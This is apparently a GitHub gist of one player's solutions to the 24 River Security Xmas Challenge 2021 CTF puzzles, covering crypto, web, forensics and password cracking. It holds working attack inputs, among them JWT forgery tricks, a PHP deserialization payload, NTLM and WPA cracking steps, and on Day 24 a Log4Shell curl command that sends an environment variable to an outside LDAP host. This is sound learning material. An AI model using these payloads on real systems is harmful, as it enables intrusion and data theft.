Skip to content

Instantly share code, notes, and snippets.

@Bentis
Last active December 29, 2021 11:52
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Bentis/5f8a4fe2920ebc3997b17f1afa5ab3fd to your computer and use it in GitHub Desktop.
Save Bentis/5f8a4fe2920ebc3997b17f1afa5ab3fd to your computer and use it in GitHub Desktop.
RSXC 2021

RSXC.no

Solutions for River Security Xmas Challenge (RSXC) 2021

Challenges were available on http://rsxc.no

Day 1:

Solution: nmap -p30000-31000 rsxc.no

$ nc rsxc.no 30780
RSXC{Congrats!You_found_the_secret_port_I_was_trying_to_hide!}

RSXC{Congrats!You_found_the_secret_port_I_was_trying_to_hide!}

Day 2:

Solution: Brute force 1 byte with python script

$ echo -en "\xd4" | nc rsxc.no 20002
RSXC{You_found_the_magic_byte_I_wanted_Good_job!}

RSXC{You_found_the_magic_byte_I_wanted_Good_job!}

Day 3:

Hint from discord: cyber chef
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)From_Base58('rpshnaf39wBUDNEGHJKLM4PQRST7VWXYZ2bcdeCg65jkm8oFqi1tuvAxyz',true)Bzip2_Decompress(false)From_Base85('!-u')From_Morse_Code('Space','Line%20feed')From_Hex('Auto')From_Base32('A-Z2-7%3D',false)

data -> Base64 -> Base58 (ripple) -> Bzip2 -> Base85 -> morse code -> hex -> base32 ->

RSXC{I_hope_you_used_cyber_chef_it_does_make_it_alot_easier}

Day 4:

Known plaintext: RSXC
XOR each byte until plaintext found
Gives key: 0x88 0xc5 0x54 0xd5
Use this key cyclical on input

RSXC{Most_would_say_XOR_isn't_that_useful_anymore}

Day 5:

PCAP file, open in wireshark
Identify TCP stream: IRC connection
"What about encrypting a zip file containing the flag? Let's say a 10 digit long number above 9 954 000 000 as the password?"
Identify FTP transfer: flag.zip, extract to file\

Brutefore password with python script
Found password: 9954359864
Extracting flag.txt

RSXC{Good_job_analyzing_the_pcap_did_you_see_the_hint?}

Day 6:

Vigenère cipher
Manually brute key until known prefix RSXC: YMZH
Through trial and error next key byte is: G
full key YMZHG ->

RSXC{isthisnotjustafancycaesarcipher}

Day 7:

Exif contains thumbnail

$ exif -e 07-challenge.jpg
Wrote file '07-challenge.jpg.modified.jpeg'

thumbnail contains flag:

RSXC{Sometimes_metadata_hides_stuff}

Day 8:

Decrement note ID in URL to find hidden note with flag

http://rsxc.no:20008/notes.php?id=0

RSXC{Remember_to_secure_your_direct_object_references}

Day 9:

md5 hash as identifier.
"note0" -> 65b29a77142a5c237d7b21c005b72157
"flag" -> http://rsxc.no:20009/notes.php?id=327a6c4304ad5938eaf0efb6cc3e53dc

RSXC{MD5_should_not_be_used_for_security.Especially_not_with_known_plaintext}

Day 10:

Server sends a Flag HTTP header:

RSXC{Sometimes_headers_can_tell_you_something_useful}

Day 11:

Since q is selected based on p*p we know n is approximately p**3 (p cubed) We approximate the 3rd root of n and iterate the prevprimes to find the correct value of p and hence q decoding the ciphertext gives:

RSXC{Good_Job!I_see_you_know_how_to_do_some_math_and_how_rsa_works}

Day 12:

Read "encoding" and input from socket, perform action, send response back. Repeat 100 times within 12 seconds

RSXC{Seems_like_you_have_a_knack_for_encoding_and_talking_to_servers!}

Day 13:

React web app
Todos.js, base64 encoded string

RSXC{it_might_be_there_even_if_you_don't_include_it!}

Day 14:

Server sets JWT with algorithm "RS256", and payload with username "test"
Public key is available for verification.
Changing algorithm to "HS256" with public key as secret also creates a validated JWT
Changing username to "admin" reveals flag:

RSXC{You_have_to_remember_to_limit_what_algorithms_are_allowed}

Day 15:

Modifying the key ID (kid) header allows us to point to our own public key URL This allows us to sign the token, and have the server validate with our key.
Modifying kid and username in payload gives flag:

RSXC{Don't_let_others_decide_where_your_keys_are_located}

Day 16:

Obfuscated script. Deobfuscate in several levels gives an invalid payload url and a "hidden" base64 string which contains the flag:

RSXC{Don't_blindly_trust_obfuscated_code_it_might_do_something_bad}

Day 17:

PHP source available. Files read based on unserialized user input.
Craft an object serialization of the Card clss: O:4:"Card":1:{s:4:"file";s:8:"flag.txt";}
Pass it base64 encoded as card GET parameter and flag.txt is read:

RSXC{Care_needs_to_be_taken_with_user_supplied_input.It_should_never_be_trusted}

Day 18:

Unpack the docker image repository. Locate previous layer with file intact, extract and voila

RSXC{Now_you_know_that_docker_images_are_like_onions.They_have_many_layers}

Day 19:

Another include with filename in URL
just input base64('flag.txt') as card in url and get flag

RSXC{It_is_not_smart_to_let_people_include_whatever_they_want}

Day 20:

PHP code provided reads JSON hmac from input data.
parameters to hash_hmac is badly ordered and lets us change algorithm. We also have the key, but not the data parameter.
However we can use an invalid algorithm for hash_hmac to return false, and set the input hmac to false:

$ curl -d '{"host":"none","hmac":0}' http://rsxc.no:20020/api.php
RSXC{You_have_to_have_the_right_order_for_arguments!}

RSXC{You_have_to_have_the_right_order_for_arguments!}

Day 21:

LSASS.exe dump.
can get password hash from pypykatz:

== MSV ==
Username: river-security-xmas
Domain: DESKTOP-V1MQH3P
LM: NA
NT: 7801ee9c5762bb027ee224d54cb8f62e
SHA1: bebad302f8e64b59279c3a6747db0e076800d9ca

Challenge text mentions "rock our world" hinting to RockYou dictionary (thanks google)
Using hashcat with rockyou dictionary from kali on the NTLM password hash gives password:

alliwantforchristmasisyou

Day 22:

File is a wifi traffic capture file of a WPA reauthentication.
One again the challenge text mentiones "you rock" hinting to rockyou.txt dictionary.
We filter the dictionary for passwords starting with S, as per challenge text.
Then run aircrack-ng on the cap file.
returning in key: Santaclaws99

Decrypt capture file with airdecap-ng and opening in wireshark reveals a single TCP stream.
Following the stream we get the flag:

RSXC{WIFI_is_fun}

Day 23:

Scan server with dirb, looking for flag.txt

$ dirb http://rsxc.no:20023/ wordlists/big.txt -X /flag.txt
+ http://rsxc.no:20023/logfile/flag.txt (CODE:200|SIZE:120)

RSXC{Content_discovery_is_a_useful_to_know.Good_job_finding_the_flag}

Day 24:

The challenge text hints to logging and most likely Log4j vulnerability
Experimenting with headers and ${jndi} calls leads to an attack vector\

Since I dont want to install java on my public facing server, i ran JNDIExploit-1.2 locally,
and portforwarded a public facing port to that. Then running the attack query

$ curl rsxc.no:20024 -v -H "User-Agent: \${jndi:ldap://<REDACTEDIP>:8008/\${env:FLAG}}"

Leads to a received LDAP query:

[+] Received LDAP Query: base32_KJJVQQ33K5SV6ZDPL5WGS23FL5WG6Z3HNFXGOX3SNFTWQ5B7PU

which when base32 decoded gives the flag:

RSXC{We_do_like_logging_right?}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment